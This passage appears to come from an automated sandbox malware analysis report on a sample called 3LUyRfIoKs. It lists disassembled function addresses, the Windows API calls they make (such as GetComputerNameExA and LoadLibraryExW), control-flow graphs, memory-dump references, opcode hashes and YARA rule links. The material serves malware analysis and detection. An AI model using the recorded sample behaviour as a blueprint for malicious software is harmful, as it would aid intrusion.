                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 510f01596c43d2e7655e5b0aaffec9a824681100a653a446aaa54e68c6868710
                                                                                                                                                                                                                                                • Instruction ID: 21385c57cd0e54895a7fe4c9402b07c2bd63af18c80c2b4bf35c1af23364b760
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 510f01596c43d2e7655e5b0aaffec9a824681100a653a446aaa54e68c6868710
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E26148356043819BDB15EF19C890A3FB7A2EBD5720F19C52CE9858B291EBB0DC91C792
                                                                                                                                                                                                                                                Function 00ADC5A0 Relevance: .2, Instructions: 242COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 296dbb6428501d780592384a61487a22eea929e946bd07eeb433fb78fb1b9264
                                                                                                                                                                                                                                                • Instruction ID: fb09b249e860f0e9ab899ab314ab5578421b37d4f2ea5ca27cb865284a998490
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 296dbb6428501d780592384a61487a22eea929e946bd07eeb433fb78fb1b9264
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84516C75A083064FD728EF68C89062FB7D2ABD5720F59897EE4C69B391E6319C01CB85
                                                                                                                                                                                                                                                Function 00AACC7A Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 237503144-0
                                                                                                                                                                                                                                                • Opcode ID: 99e572c0408956fda82816b602a9a0cf9c30361984c88d2f14bc81f3be16e671
                                                                                                                                                                                                                                                • Instruction ID: 06cd75ff173aa229dce77537e7152f167601ecfc3f3d8fedc8f54f9933a461ab
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99e572c0408956fda82816b602a9a0cf9c30361984c88d2f14bc81f3be16e671
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E310AEAF002441BE90576212E63F7F61674BD6718F09102CF40B2B3C3EE69F95696A7
                                                                                                                                                                                                                                                Function 00ACD7EE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1309 acd7ee-acd7f3 1310 acd7f5-acd7f9 1309->1310 1311 acd813-acd819 1309->1311 1312 acd800-acd809 1310->1312 1313 acd896-acdbfb FreeLibrary call adfe00 1311->1313 1312->1312 1314 acd80b-acd80e 1312->1314 1318 acdc00-acdc12 1313->1318 1314->1313 1318->1318 1319 acdc14-acdc19 1318->1319 1320 acdc2d 1319->1320 1321 acdc1b-acdc1f 1319->1321 1323 acdc30-acdc72 GetComputerNameExA 1320->1323 1322 acdc20-acdc29 1321->1322 1322->1322 1324 acdc2b 1322->1324 1324->1323
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00ACD898
                                                                                                                                                                                                                                                • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 00ACDC43
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ComputerFreeLibraryName
                                                                                                                                                                                                                                                • String ID: ;87>
                                                                                                                                                                                                                                                • API String ID: 2904949787-2104535307
                                                                                                                                                                                                                                                • Opcode ID: e9531dacc6dc5ee6e652ade64745936db70065d4eb87f6fa92b73e8a478c4a2b
                                                                                                                                                                                                                                                • Instruction ID: c55cfdc29abc90549402003ba57e13ad23b31e61ddcff699c00fcdb825db99be
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9531dacc6dc5ee6e652ade64745936db70065d4eb87f6fa92b73e8a478c4a2b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE2125701047828FDB228F38C890B26BFE1EF57300F1986ADC4D68B396DB349842DB61
                                                                                                                                                                                                                                                Function 00ACD893 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1325 acd893-acdbfb FreeLibrary call adfe00 1330 acdc00-acdc12 1325->1330 1330->1330 1331 acdc14-acdc19 1330->1331 1332 acdc2d 1331->1332 1333 acdc1b-acdc1f 1331->1333 1335 acdc30-acdc72 GetComputerNameExA 1332->1335 1334 acdc20-acdc29 1333->1334 1334->1334 1336 acdc2b 1334->1336 1336->1335
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00ACD898
                                                                                                                                                                                                                                                • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 00ACDC43
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ComputerFreeLibraryName
                                                                                                                                                                                                                                                • String ID: ;87>
                                                                                                                                                                                                                                                • API String ID: 2904949787-2104535307
                                                                                                                                                                                                                                                • Opcode ID: 7c05d3527678a36208b81e3921513fc457904dca2db0a3d80e0d0208857c7cb5
                                                                                                                                                                                                                                                • Instruction ID: eb46b782648a688f020296074f57bddaa322a958a1d012b9c9643412ef1f6e23
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c05d3527678a36208b81e3921513fc457904dca2db0a3d80e0d0208857c7cb5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3811C4B11056428FD7118F34DC50B6BBBE2EF9B311F1AC6A8D4968B292DA349842DB50
                                                                                                                                                                                                                                                Function 00AA9D1E Relevance: 3.1, APIs: 2, Instructions: 142libraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000), ref: 00AA9D98
                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000), ref: 00AA9E78
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                                                • Opcode ID: 44a62f7da8b5cd8f58770a76da71fa02244359b2deab32f7e88358ee38b99b90
                                                                                                                                                                                                                                                • Instruction ID: 7a439e8cb60200fdad9ce3ec5f8602b4b0eca913d474cbfd67e0349b3cc213f2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44a62f7da8b5cd8f58770a76da71fa02244359b2deab32f7e88358ee38b99b90
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1411274D003409FE7159F7899D2A9A7F71EB06324F51829CD5A02F3E6C731940ACBE2
                                                                                                                                                                                                                                                Function 00AAEF53 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 00AAF09C
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                                                                                                                                • Opcode ID: b58e6e74f33d7de81737e9668790be66ccf924deba8d0ab5e26be1b3bc9943cb
                                                                                                                                                                                                                                                • Instruction ID: 2d33b6920e3efbf262dca48e39afb9cf8420e0aec0314133e5f43844756dc6ce
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b58e6e74f33d7de81737e9668790be66ccf924deba8d0ab5e26be1b3bc9943cb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E41C9B4C10B40AFD370EF39994B7137EB4AB05250F504B1DF9E6866D4E631A4198BD7
                                                                                                                                                                                                                                                Function 00ACD7BD Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 00ACDD03
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ComputerName
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3545744682-0
                                                                                                                                                                                                                                                • Opcode ID: e2a3065ada8e8b10ffe1c0a47e0b6595f0a3982c157be99bca73d2a3b28e5a8e
                                                                                                                                                                                                                                                • Instruction ID: 9e8be76cb071b45509991fe4384368e8854c644bd6350ce29f0f7679dfa09a05
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e2a3065ada8e8b10ffe1c0a47e0b6595f0a3982c157be99bca73d2a3b28e5a8e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA21A4705087918FD7268B34C4A0B32BBE1BF5B304F1995DDD4D78B786CA78A445C761
                                                                                                                                                                                                                                                Function 00ACDC76 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 00ACDD03
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ComputerName
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3545744682-0
                                                                                                                                                                                                                                                • Opcode ID: f3499dd09175a5eb5ed408f2c542c70bf78660350b36dab79e41ec349bf8a4cc
                                                                                                                                                                                                                                                • Instruction ID: 84fa238cf61d26aa3b9c0479c8a6477b8d7fd4f0dceac71042e3822f8575a545
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f3499dd09175a5eb5ed408f2c542c70bf78660350b36dab79e41ec349bf8a4cc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA11C4B06047918BD7258B34C860722BBA2BF4A304B1DC69DD496CB782CA38D441C761
                                                                                                                                                                                                                                                Function 00ADE0A0 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlReAllocateHeap.NTDLL(?,00000000), ref: 00ADE0E0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocateHeap
